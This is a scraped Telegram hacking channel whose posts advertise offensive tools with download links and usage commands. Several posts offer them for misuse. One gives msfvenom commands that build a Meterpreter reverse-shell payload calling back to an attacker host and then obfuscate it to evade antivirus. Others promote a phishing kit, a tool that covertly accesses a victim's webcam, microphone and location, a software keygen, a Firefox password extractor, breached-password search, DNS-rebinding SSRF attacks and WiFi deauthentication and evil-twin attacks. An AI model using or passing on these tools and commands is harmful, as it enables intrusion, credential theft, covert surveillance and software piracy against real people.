BugCod3
7.26K subscribers
334 photos
6 videos
7 files
443 links
[ BugCod3 ] โ€” From Shadows To Shells โšก๏ธ

๐Ÿ•ถ Hacking | ๐Ÿž Bug Bounty | ๐Ÿ” Security Tools
โš”๏ธ Learn โ€ข Hunt โ€ข Dominate

๐Ÿ‘ฅ Group: T.me/BugCod3GP
๐Ÿ“‚ Topic: T.me/BugCod3Topic

๐ŸŒ Web: BugCod3.com
๐Ÿค– Contact: T.me/BugCod3BOT
๐Ÿ“ง Email: BugCod3@protonmail.com
Download Telegram
A Tool With Attractive Capabilities.

Features:

โšช๏ธ Obtain Device Information Without Any Permission !
โšช๏ธ Access Location [SMARTPHONES]
โšช๏ธ Access Webcam
โšช๏ธ Access Microphone

GitHub

#Python #social_engineering_attacks #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/MRvirusIRBOT
๐Ÿ“ข T.me/BugCod3
โšก2
Python Obfuscator for FUD Python Code.

Example: Creating FUD Meterpreter
Python Payload

1. Generate
Python Payload:
msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt

2. Obfuscate Payload
onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfuscated_payload.txt

GitHub

#Python #bypass_antivirus #FUD #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/MRvirusIRBOT
๐Ÿ“ข T.me/BugCod3
๐ŸŒŸ Discord Nitro Generator and Checker ๐ŸŒŸ

A discord nitro generator and checker for all your nitro needs

It generates and checks discord nitro codes at the same time for maximum efficiency

๐Ÿ“ Getting Started
To get a local copy up and running follow these simple steps.

โž• Prerequisites
You need to install Python, that can be done here

โฌ‡๏ธ Download OR Clone the repo github

โ—€๏ธ Install Python packages
โžœ ~ python3.8 -m pip install -r requirements.txt

โžก๏ธ Usage
Run the main.py file using py -3 main.py The code will show you two prompts:

1. How many codes to generate
2. If you want to use a discord webhook, if you dont know how to get a discord webhook url it is located at
channel settings ยป intergrations ยป webhooks ยป create webhook
If you dont want to use a webhook simply leave this blank

The code will start generating and checking after that step

๐Ÿ˜ธ Github

โš ๏ธ This program has not been tested by our team โš ๏ธ

#Python #Generator #Checker #Discord #Nitro
โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—
๐Ÿ‘ค T.me/MRvirusIRBOT
๐Ÿ“ข T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โคโ€๐Ÿ”ฅ4
๐ŸŒŸ Photon ๐ŸŒŸ

Incredibly fast crawler designed for OSINT

Photon can extract the following data while crawling:
โšช๏ธURLs (in-scope & out-of-scope)
โšช๏ธURLs with parameters (example.com/gallery.php?id=2)
โšช๏ธIntel (emails, social media accounts, amazon buckets etc.)
โšช๏ธFiles (pdf, png, xml etc.)
โšช๏ธSecret keys (auth/API keys & hashes)
โšช๏ธJavaScript files & Endpoints present in them
โšช๏ธStrings matching custom regex pattern
โšช๏ธSubdomains & DNS related data


โฌ‡๏ธ Download
๐Ÿ˜ธ Github

#Python #Crawler #Osint #Spider
โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—
๐Ÿ‘ค T.me/MRvirusIRBOT
๐Ÿ“ข T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘2๐Ÿ˜ฑ2โค1
๐Ÿฅท PyPhisher ๐Ÿฅท

โ–ถ A video of the pyphisher tool in action

๐Ÿ’ฌ
Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others.

โฌ‡๏ธ Download
๐Ÿ‘โ€๐Ÿ—จ Previous Post

#Python #PyPhisher
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
3โšก1โค1๐Ÿคฉ1
๐Ÿซฅ MobaXterm Keygen ๐Ÿ”˜

โš ๏ธ Please see source code. It is not complex. โš ๏ธ

I don't know how to make custom settings take effect in Customizer mode directly.

๐Ÿ’ฌ
The only way I found is that you should export custom settings to a file named MobaXterm customization.custom which is also a zip file. Then merge two zip file: Custom.mxtpro and MobaXterm customization.custom to Custom.mxtpro. Finally copy newly-generated Custom.mxtpro to MobaXterm's installation path.

๐Ÿ“Š Postscript:
โšช๏ธ This application does not have complex activation algorithm and it is truly fantastic. So please pay for it if possible.

โšช๏ธ The file generated, Custom.mxtpro, is actually a zip file and contains a text file, Pro.key, where there is a key string.

โšช๏ธ MobaXterm.exe has another mode. You can see it by adding a parameter "-customizer".
./MobaXterm.exe -customizer


๐Ÿ’ป Usage:
./MobaXterm-Keygen.py "DoubleSine" 10.9


๐Ÿ˜ธ Github

โฌ‡๏ธ Donwload
๐Ÿ”’ BugCod3

#Python #MobaXterm #Keygen #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
6โšก1โค1
โ˜ ๏ธ xnLinkFinder v4.4 โ˜ ๏ธ

๐Ÿ’ฌ
A python tool used to discover endpoints, potential parameters, and a target specific wordlist for a given target

๐Ÿ“Š This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:
โšช๏ธ crawling a target (pass a domain/URL)
โšช๏ธ crawling multiple targets (pass a file of domains/URLs)
โšช๏ธ searching files in a given directory (pass a directory name)
โšช๏ธ get them from a Burp project (pass location of a Burp XML file)
โšช๏ธ get them from an OWASP ZAP project (pass location of a ZAP ASCII message file)
โšช๏ธ get them from a Caido project (pass location of a Caido export CSV file)
โšช๏ธ processing a waymore results directory (searching archived response files from waymore -mode R and also requesting URLs from waymore.txt and the original URLs from index.txt - see waymore README.md)

๐Ÿ”ผ Installation:
cd xnLinkFinder
sudo python setup.py install


๐Ÿ’ป Usage:
python xnLinkFinder.py --help


๐Ÿ“‚ Examples:
#specific target
python3 xnLinkFinder.py -i target.com -sf target.com

#list of URLs
python3 xnLinkFinder.py -i target_js.txt -sf target.com


๐Ÿ˜ธ Github

โฌ‡๏ธ Donwload
๐Ÿ”’ BugCod3

#Python #Discover #Endpoints
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘3โšก2๐Ÿ”ฅ2โค1
NetProbe: Network Probe

๐Ÿ’ฌ
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

๐Ÿ“Š Features:
โšช๏ธ Scan for devices on a specified IP address or subnet
โšช๏ธ Display the IP address, MAC address, manufacturer, and device model of discovered devices
โšช๏ธ Live tracking of devices (optional)
โšช๏ธ Save scan results to a file (optional)
โšช๏ธ Filter by manufacturer (e.g., 'Apple') (optional)
โšช๏ธ Filter by IP range (e.g., '192.168.1.0/24') (optional)
โšช๏ธ Scan rate in seconds (default: 5) (optional)

๐Ÿ”ผ Installation:
cd NetProbe
pip install -r requirements.txt


๐Ÿ’ป Usage:
python3 netprobe.py โ€”help


๐Ÿ“‚ Example:
python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l


๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Python #Network #Scanner #Vulnerability #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก4โค3๐Ÿ”ฅ1
10000 h1 disclosed reports

๐Ÿ’ฌ
On 31st Dec 2023, I made it my goal to read 10,000 H1 Reports in 2024 Q1 (i.e. first 3 months) to really understand deep down what kind of bugs are being reported, accepted, or rejected and how exactly I should approach my journey in #bugbounty. Also, I thought, there was no better resource than actual disclosed bug reports. Later I decided to cap my goal at *5000* because I think I nailed the common pattern and already accomplished what I wanted to get out of it.

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Python #H1 #Report
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก3โค2๐Ÿ”ฅ1๐Ÿ’ฏ1
๐Ÿ’€ LeakSearch ๐Ÿ’€

๐Ÿ’ฌ
LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.
In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.

Requirements:
โšช๏ธ Python 3
โšช๏ธ Install requirements pip install -r requirements.txt

๐Ÿ’ป Usage:
LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Python #Search #Parse #Password
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ3โค2โšก1๐Ÿ‘1๐Ÿ’ฏ1
java2S3 Amazon S3 Bucket Enumeration Tool

Introduction:
This Python script automates the enumaration of S3 Buckets referenced in a subdomain's javascript files. This allows the bug bounty hunter to check for security misconfigurations and pentest Amazon S3 Buckets.

Features:
โšช๏ธ Fetches HTTP status codes for subdomains
โšช๏ธ Retrieves JavaScript URLs associated with each subdomain
โšช๏ธ Identifies Amazon S3 buckets in the content

Getting Started:
Prerequisites:
Python 3.x
Install required libraries:
pip install requests


Usage:
Create a text file (input.txt) containing a list of subdomains (one per line).

python js2s3.py input.txt example.com output.txt


Github

โฌ‡๏ธ Download
๐Ÿ”“ BugCod3

#Python #Amazon #S3 #Buckets
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โšก2โค1๐Ÿ”ฅ1
httprebind

Automatic tool for DNS rebinding-based SSRF attacks

Installation:
sudo pip install dnslib flask flask_cors


Usage:
sudo python httprebind.py domain.name serverIp mode


Where mode is one of: ec2, ecs, gcloud

Make sure you point your domain's nameservers to the server indicated by serverIp, and that that IP is the external address of the server, IPv4.

Github

โฌ‡๏ธ Download
๐Ÿ”“ BugCod3

#Python #DNS #SSRF #Attack
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โšก1โค1๐Ÿ”ฅ1
Form Finder

This script can be used to find HTML forms in the list of endpoints/URLs.

Usage:
python3 formfinder.py endpoints.txt


๐Ÿ˜ธ Github

โฌ‡๏ธ Donwload
๐Ÿ”’ BugCod3

#Python #Form #Finder
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
โ›“ T.me/BugCod3Topic
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ3โšก2โค1๐Ÿ‘1
๐Ÿ’œ knoxnl ๐Ÿ’œ

๐Ÿ’ฌ
This is a python wrapper around the amazing KNOXSS API by Brute Logic. To use this tool (and the underlying API), you must have a valid KNOXSS API key. Don't have one? Go visit https://knoxss.me and subscribe! This was inspired by the "knoxssme" tool by @edoardottt2, but developed to allow for greater options.

๐Ÿ”ผ Installation:
NOTE: If you already have a `config.yml` file, it will not be overwritten. The file `config.yml.NEW` will be created in the same directory. If you need the new config, remove `config.yml` and rename `config.yml.NEW` back to `config.yml`.

pip install knoxnl


๐Ÿ’ป Examples:
knoxnl -i "https://brutelogic.com.br/xss.php"

Or a file of URLs:
knoxnl -i ~/urls.txt


๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Python #Scanner #XSS #Knoxnl
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ3โšก2โค1
This media is not supported in your browser
VIEW IN TELEGRAM
๐ŸŒ Ominis OSINT: Secure Web-Search ๐ŸŒ

๐Ÿ“Š Features:
๐Ÿš€ Enhanced User Interface: Enjoy a redesigned interface for a seamless experience, suitable for both novice and experienced users.
๐Ÿ”Ž Expanded Digital Reconnaissance: Conduct thorough investigations with advanced tools to gather and analyze publicly available information from diverse online sources.
๐Ÿ’ก Threading Optimization: Experience faster execution times with optimized threading, improving efficiency and reducing waiting periods during username searches.
๐Ÿ“Š Detailed Results: Gain comprehensive insights from search results, including detailed information extracted from various sources such as social profiles, mentions, and potential forum links.
โš™๏ธ Proxy Validation: The tool validates proxies for secure and efficient web requests, ensuring anonymity and privacy during the search process. This feature enhances the reliability of the search results by utilizing a pool of validated proxies, mitigating the risk of IP blocking and ensuring seamless execution of the search queries.
๐Ÿ•ต๏ธโ€โ™‚๏ธ Human-like Behavior Mimicking: To mimic human-like behavior and avoid detection by anti-bot mechanisms, the tool randomizes user agents for each request. This helps in making the requests appear more natural and reduces the likelihood of being flagged as automated activity.
๐Ÿ›ก Randomized Proxy Agents: In addition to proxy validation, the tool utilizes randomized proxy agents for each request, further enhancing user anonymity. By rotating through a pool of proxies, the tool reduces the chances of being tracked or identified by websites, thus safeguarding user privacy throughout the reconnaissance process.
๐Ÿ” Username Search: Searches a list of URLs for a specific username. Utilizes threading for parallel execution. Provides detailed results with URL and HTTP status code.

๐Ÿ”ผ Installation:
cd Ominis-Osint
pip install -r requirements.txt
python3 Ominis.py


๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Python #Osint #Search #Engin #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก3๐Ÿ”ฅ3โค2๐Ÿ‘1
excludeparked

๐Ÿ’ฌ
A lightweight Python 3 script that filters out parked HTTP domains from a list of domains. Useful when pulling a list of domains from a reverse WHOIS lookup service (from a tool such as WHOXY).

This was tested on a list of 100k parked domains but it's subject to improvement as this tool is intended to be a rough method of filtering down thousands of domains in the recon phase of a pentest.

๐Ÿ”ผ Install:
cd excludeparked
pip install -r requirements.txt

๐Ÿ’ป Usage:
python3 ./excludeparked.py -h


๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’BugCod3

#Python #Parked #Domain
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค2๐Ÿ”ฅ2โšก1๐Ÿ‘1
๐Ÿ›œ Freeway ๐Ÿ›œ

WiFi Penetration Testing & Auditing Tool

๐Ÿ’ฌ
Freeway is a Python scapy-based tool for WiFi penetration that aim to help ethical hackers and pentesters develop their skills and knowledge in auditing and securing home or enterprise networks.

๐Ÿ“Š Features:
โšช๏ธ IEEE 802.11 Packet Monitoring
โšช๏ธ Deauthentication Attack
โšช๏ธ Beacon Flood
โšช๏ธ Packet Fuzzer
โšช๏ธ Network Audit
โšช๏ธ Channel Hopper
โšช๏ธ Evil Twin
โšช๏ธ Packet Crafter

๐Ÿ“‚ Preparation:
โšช๏ธ A network adapter supporting monitor mode and frame injection.
โšช๏ธ An operating system running a Linux distribution.
โšช๏ธ Python 3+ installed.

๐Ÿ”ผ Installation:
PIP:
sudo pip install 3way

Manually:
cd Freeway
sudo pip install .


๐Ÿ’ป Usage:
#1 sudo Freeway
#2 sudo Freeway -i wlan2 -a monitor -p 1,2,a
#3 sudo Freeway -i wlan2 -a deauth


๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Python #Wifi #Pentesting
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค3๐Ÿ‘3โšก2๐Ÿ”ฅ2
Firefox Decrypt

๐Ÿ’ฌ
Firefox Decrypt is a tool to extract passwords from Mozilla (Firefoxโ„ข, Waterfoxโ„ข, Thunderbirdยฎ, SeaMonkeyยฎ) profiles

๐Ÿ’ป Usage:
cd firefox_decrypt
python firefox_decrypt.py


Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Python #Firefox #Extract #Password #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ“ฃ T.me/Root_Exploit
๐Ÿ“ฃ T.me/BugCod3
โšก4โค3๐Ÿ”ฅ3
๐Ÿฆ… Blackbird ๐Ÿฆ…

๐Ÿ’ฌ
Blackbird is a robust OSINT tool that facilitates rapid searches for user accounts by username or email across a wide array of platforms, enhancing digital investigations. It features WhatsMyName integration, export options in PDF, CSV, and HTTP response formats, and customizable search filters.

๐Ÿ”ผ Installation:
cd blackbird
pip install -r requirements.txt


๐Ÿ’ป Usage:
Search by username ๐Ÿ‘ค
python blackbird.py --username username1 username2 username3

Search by email ๐ŸŒ
python blackbird.py --email email1@email.com email2@email.com email3@email.com

Export results to PDF ๐Ÿ“‚
python blackbird.py --email email1@email.com --pdf

โœจ AI:
Blackbird uses AI-powered NER models to improve metadata extraction, identifying key entities for faster and more accurate insights.
python blackbird.py --username username1 --ai

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Python #Osint #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค8๐Ÿ‘4๐Ÿ”ฅ3โšก2
CVE-2024-55591

A Fortinet FortiOS Authentication Bypass Vulnerable Behaviour Detection

๐Ÿ’ฌ
Description:
This script attempts to create a WebSocket connection at a random URI from a pre-authenticated perspective to the FortiOS management interface, and reviews the response to determine if the instance is vulnerable

Affected Versions:
โšช๏ธ FortiOS 7.0.0 through 7.0.16
โšช๏ธ FortiProxy 7.0.0 through 7.0.19
โšช๏ธ FortiProxy 7.2.0 through 7.2.12

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Python #CVE #Vulnerable #Detection
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘4โค3๐Ÿ”ฅ3โšก2๐Ÿ‘Ž1